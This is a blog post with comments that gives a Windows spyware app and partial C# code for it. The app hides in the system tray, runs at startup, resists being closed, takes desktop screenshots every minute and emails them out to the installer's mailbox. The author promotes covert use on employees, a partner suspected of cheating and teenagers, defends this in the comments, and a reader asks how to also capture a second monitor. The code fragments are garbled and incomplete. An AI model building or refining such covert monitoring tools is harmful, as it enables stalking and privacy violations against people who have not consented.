Some time back I needed to capture a certain computers desktop
in order to find out what that user is doing every day. So, I made
a .NET 2.0 Winforms Application which stays on system tray
(optional) and capture the desktop in given time interval (say
every 60 secs) and emailed the captured images to me as
message attachment (say every 30 mins). It ensures the captures are
small enough and embedded inside HTML email so that I don’t need to
open hundreds of attachments and see the screenshots. I could just
read through the email and see the captures made. You will find
this application quite handy in many use cases including:
- Keep an eye on developers who spend too much time on web and
chatting. See what they really do. - Keep an eye on your better half incase s/he is cheating on
you. - Keep an eye on your teenagers and see how they use
computer. Find the amount of time they browser porn on
All you do is sit back and relax in your office and the app
informs you every 30 mins via email what your subject is doing on
the computer. You don’t need to worry about missing some captures
when you are away from your computer. It will be safely kept in
your inbox and you can go through all the captures on your
Configure the following settings from the Visual Studio Settings
Designer (if you have Visual Studio):
Configure the path where the screenshots will be stored. Then
configure the duration, default is every 1 minute, one screenshot
is taken. “To” contains the email address of yours. Use free email
services because very soon you will find it’s filled up. Username
and Password is for the SMTP authentication. “SMTP” contains the
SMTP Server name or IP. “MailSendDelay” is the delay between
sending emails.
All you need to do is build the app and install/run it once on
the computer which you want to keep an eye on. It will hide itself
on the system tray as a harmless icon and register itself on the
startup and start capturing immediately. After a week or two,
cleanup the “C:temp” folder where the screenshots are kept.
You can also configure the properties at run time after running
it once on a computer. This is for those who does not have Visual
Studio in order to configure the settings before building
In order to launch the configuration dialog box while the
application is running, find the icon on the system tray and click
mouse buttons exactly in this order:
- Press left and right mouse button on the icon one after
another - Release only the right mouse button while holding the left
mouse button down
This will bring up the configuration dialog:
Here you can make changes while it is running.
Let’s learn some interesting stuffs from this application:
1. Prevent closing the application when close button is
FormClosingEventArgs e) { Settings.Default.Save();
this .Hide(); e.Cancel = true
; }
2. Capturing the screenshot
Screen.PrimaryScreen.Bounds.Height, PixelFormat.Format32bppArgb))
{ // Create a graphics object from the bitmap
using (Graphics gfxScreenshot = Graphics.FromImage(bmpScreenshot)) {
try { Log( “ Capture
screen “ ); //
Take the screenshot from the upper
left corner to the right bottom corner gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X,
Screen.PrimaryScreen.Bounds.Y, 0 ,
0 , Screen.PrimaryScreen.Bounds.Size,
First a bitmap object for the whole screen size is created and
then the graphics from the screen is copied to the Bitmap
3. Convert the Bitmap to low resolution JPEG
format ImageCodecInfo
codec = GetEncoderInfo( “ image/jpeg “ );
// Set the quality to very low System.Drawing.Imaging.Encoder
qualityEncoder =
EncoderParameter ratio =
new EncoderParameter(qualityEncoder,
10L ); //
Add the quality parameter to the
list EncoderParameters
codecParams =
new EncoderParameters( 1 );
codecParams.Param[ 0
] = ratio;
Here we configure the JPEG codec with very low resolution (10%).
GetEncoderInfo is a function which runs through all available
codecs and finds the one we need.
{ int j; ImageCodecInfo[] encoders; encoders
= ImageCodecInfo.GetImageEncoders();
for (j =
0 ; j < encoders.Length; ++ j) {
if (encoders[j].MimeType == mimeType) return encoders[j]; } return null ;
4. Saving bitmap using codec
FileStream(filePath, FileMode.Create))
{ bmpScreenshot.Save(fs, codec, codecParams); fs.Close();
5. Handling Win32Exception
I noticed sometimes during screen capture, an unknown
Win32Exception throws up. There’s no way to work around this
problem until I restart the application. Here’s how I do it:
if (x is
Win32Exception) { Log(
“ Restarting… “ );
Application.Restart(); } }
6. Email the pictures as embedded image in HTML format
First connect to the mail server using
= new SmtpClient(Settings.Default.Smtp);
client.Credentials =
new NetworkCredential(Settings.Default.UserName,
Settings.Default.Password); MailMessage msg = new
Settings.Default.To); msg.Subject = DateTime.Now.ToString(); msg.IsBodyHtml
= true ;
We are going to construct an Html mail where the images will be
inline. The tricky part is to build the body of the message. The
body requires that we create tag for each image inside
the body in this format:
The ID needs to be the ContentID of the LinkedResource instance
which is created for each image. Here’s the code:
List < LinkedResource > (); for
( int i
= Settings.Default.LastSentFileNo; i
< Settings.Default.LastFileNo; i ++ ) {
string filePath = FilePath(i); // then we
create the Html part //
to embed images, we need to use the
prefix ‘cid’ in the img src value // the cid
value will map to the Content-Id of a Linked resource.
// thus
a LinkedResource with a ContentId of ‘companylogo’
body.AppendLine( “
+ i.ToString() + “
/> “ );
// create the LinkedResource (embedded image)
LinkedResource logo
= new LinkedResource(filePath); logo.ContentId
= “ Capture “ +
i.ToString(); // add the
LinkedResource to the appropriate view resources.Add(logo); }
I keep a counter for the last capture file name and the last
emailed file number. Then for each capture file which has not been
emailed yet, I create a LinkedResource for the image and then
add it in the resources list. I also build the body of the message
which contains the tag with the LinkedResource
Then we create something called AlternateView for the message
body which says the message has a HTML view:
= AlternateView.CreateAlternateViewFromString(body.ToString(),
null , “
text/html “ );
foreach (LinkedResource resource in resources)
This view contains the HTML body and the resource
After this, the email is sent asynchronously so that the screen
capture process does not get stuck. It generally takes a while to
send the image with all the screenshots embedded. So, you can’t do
this synchronously.
* 60 *
1000 ; client.SendAsync(msg, “” );
client.SendCompleted +=
new SendCompletedEventHandler(client_SendCompleted);
mailSendTimer.Stop(); Log( “ Sending
mail… “ ); } catch (Exception x) { Log(x.ToString()); }
That’s all folks!
Misho bhaia….its quite different and inovative project…:) Well done 🙂
Good, Is there any method to make the application not sending an email but Make HTML File on C:Temp e.g.
I have downloaded and installed on my machine. I really appreciate its working. But I am afraied how to uninstall it. Please do help. Waiting for your reply.
Just delete the EXE from where you installed it.
Yup, the concept is good. But the usage you mentioned – the first two (keep an eye on developer or better half) sounds mean to me. As being a developer, I know it very well you can’t get good output from them by doing a surveillance like prisoners. And the same thing applies also for the 2nd usage – without having faith you can’t get 100% whether its in a company or in a family or in a relation.
Hi Shahid,
You are right about your views. Unfortunately, there are sometimes loose cannons in the company who secretly try to do everything possible to cause damage to the company. So, you need to sometimes play dirty.
Same goes for better half. Sometimes you know you are being cheated and you just need proof of that so that you can.…/922901.html 10…
U are a genious.I am also starting my career as .net developer.
Just wondering if it's possible to capture the second monitor as well, or detect if they have another monitor set up, otherwise if they know about ti, the second montiror is where everything you don't want to see will be displayed.